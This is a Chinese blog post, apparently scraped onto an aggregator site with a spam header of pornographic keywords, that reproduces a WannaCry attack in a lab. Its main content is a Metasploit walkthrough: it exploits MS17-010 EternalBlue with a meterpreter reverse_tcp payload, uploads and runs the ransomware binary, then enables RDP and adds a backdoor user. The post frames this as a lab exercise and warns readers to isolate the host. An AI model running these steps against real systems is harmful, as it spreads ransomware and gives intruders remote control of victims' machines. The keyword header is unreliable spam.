日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

勒索病毒“WannaCry”复现

發布時間:2024/9/30 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 勒索病毒“WannaCry”复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞簡介

永恒之藍利用Windows系統的SMB漏洞可以獲取系統的最高權限,然后通過惡意代碼掃描開放445端口的Windows系統;只要是被掃描到的Windows系統,只要開機上線,不需要用戶進行任何操作,即可通過共享漏洞上傳wannacry勒索病毒,遠程控制木馬等惡意程序。

準備過程

0x00:做好防護

在復現過程中需要先做好防護,以免造成真機感染病毒,那就GG了

先將共享文件夾給禁用掉,為了以防萬一這里再把真機的入站規則改一下,阻止445端口連接

0x02:實驗環境

kail:192.168.186.134 win7:192.168.186.131 病毒樣本

漏洞復現

WannaCry是在永恒之藍的基礎上產生的,因此需要先通過永恒之藍獲得shell權限。

永恒之藍的編號是MS17-010,先使用msfconsole搜索一下漏洞模塊

search ms17-010


這里先使用下

auxiliary/scanner/smb/smb_ms17_010

這個作為搜索模塊對靶機進行漏洞掃描

發現存在漏洞(注意在虛擬機中win7靶機需要關閉防火墻才可以發現),既然有漏洞那下面就使用攻擊模塊

use exploit/windows/smb/ms17_010_eternalblue

設置一下靶機的IP地址

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.186.131

再設置下攻擊的payload,這里選擇

windows/x64/meterpreter/reverse_tcp


最后再設置一下攻擊機的IP即可

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.186.134


進行攻擊

exploit


攻擊成功,將我們前面準備好的WannaCry病毒上傳進去對方的主機中

upload /tmp/wcry.exe c://


進入shell權限,dir一下,發現上傳成功

執行病毒即可

c:\>wcry.exe


接下來使用一下enable_rdp 腳本來開啟遠程桌面

run post/windows/manage/enable_rdp #開啟遠程桌面 run post/windows/manage/enable_rdp USERNAME=shy2 PASSWORD=123456 #添加用戶 run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #將3389端口轉發到6662

遠程桌面連接Win7

rdesktop 192.168.190.131:3389


復現成功

總結:

復現該病毒時一定要注意做好防護,這類病毒的傳播性很強切勿用于惡作劇,切記切記!

總結

以上是生活随笔為你收集整理的勒索病毒“WannaCry”复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。